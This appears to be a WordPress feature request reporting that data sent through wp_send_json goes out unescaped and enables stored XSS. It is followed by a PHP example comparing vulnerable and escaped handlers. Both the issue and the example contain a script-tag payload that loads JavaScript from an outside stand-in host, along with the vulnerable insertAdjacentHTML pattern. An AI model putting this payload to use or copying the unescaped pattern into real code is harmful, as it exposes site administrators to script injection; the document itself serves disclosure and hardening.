Is your feature request related to a problem?
The value/data sent in wp_send_json is never escaped and there's no escaping error reported for it either.
This allows for extremely simple XSS in many cases.
In its most simplistic form, a user sets his e.g. last name/address/whatever to `<script src="https://external.com/malicious.js"></script>`.
Then in wp-admin another user interacts with that and it is saved with AJAX, with code like

```php
wp_send_json_success( 'Updated ' . $old_address );
```

Then the response is inserted in the website using

```js
const notice = '<div class="notice success"><p>' + response.data + '</p></div>';
document.getElementById( '...' ).insertAdjacentHTML( 'afterbegin', notice );
```

There are multiple similar XSS attack vectors active on multiple large plugins at the moment, which is why I kept it rather vague on purpose.
Describe the solution you'd like
Require escaping at least for strings, ideally for all variables passed to those functions.
Additional context (optional)
- I intend to create a pull request to implement this feature.
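The scenario above, written out as an added example that is not part of the issue or of WordPress itself. It runs stand-alone without WordPress: `demo_send_json_success()` and `demo_esc_html()` are assumed stand-ins for `wp_send_json_success()` and `esc_html()` (the real `wp_send_json_success()` JSON-encodes `['success' => true, 'data' => $data]` and exits; here it returns the JSON so both handlers can be compared in one run). The address value is a constructed attacker payload taken from the issue text.

```php
<?php
// Added example, not code from the issue or from WordPress.
// demo_send_json_success() and demo_esc_html() are assumed stand-ins for the
// WordPress functions wp_send_json_success() and esc_html().

// Stand-in for wp_send_json_success(): encode ['success' => true, 'data' => $data].
// The real function also sets the JSON content type and exits; here we return the
// body so both handlers can be compared in one run.
function demo_send_json_success( $data ) {
    return json_encode( array( 'success' => true, 'data' => $data ) );
}

// Stand-in for esc_html(): escape &, <, >, " and ' for an HTML text context,
// which is what the client-side insertAdjacentHTML() call in the issue expects.
function demo_esc_html( $text ) {
    return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
}

// Vulnerable handler from the issue: the stored, attacker-controlled value goes
// straight into the response. json_encode() only escapes for JSON transport
// (e.g. "/" becomes "\/"); the client's JSON.parse() undoes that, so the
// <script> tag reaches insertAdjacentHTML() intact.
function vulnerable_handler( $old_address ) {
    return demo_send_json_success( 'Updated ' . $old_address );
}

// Hardened handler: escape for the HTML context the client inserts into.
// After JSON.parse() the client receives "Updated &lt;script ...", which
// insertAdjacentHTML() renders as literal text instead of executing it.
function hardened_handler( $old_address ) {
    return demo_send_json_success( 'Updated ' . demo_esc_html( $old_address ) );
}

// Constructed attacker payload: the value a user stores as last name/address.
$old_address = '<script src="https://external.com/malicious.js"></script>';

echo "vulnerable: ", vulnerable_handler( $old_address ), "\n";
echo "hardened:   ", hardened_handler( $old_address ), "\n";

// Check that JSON encoding alone does not neutralise the payload: decoding the
// vulnerable response (as the browser does) gives the original tag back.
$decoded = json_decode( vulnerable_handler( $old_address ), true );
echo "tag survives JSON round trip: ",
    ( $decoded['data'] === 'Updated ' . $old_address ) ? 'yes' : 'no', "\n";

// The hardened response contains no raw "<" after decoding.
$decoded = json_decode( hardened_handler( $old_address ), true );
echo "raw '<' in hardened data: ",
    ( strpos( $decoded['data'], '<' ) === false ) ? 'none' : 'present', "\n";
```

The escaping has to match the sink: `esc_html()` is right when the client inserts `response.data` as HTML, as in the issue. If the client instead assigns it to `textContent` or builds the notice with `createElement`/`append`, the escaped entities would show up literally (`&lt;script&gt;`), so a sniff that requires escaping in `wp_send_json*()` would need the calling code to document which context the data is destined for.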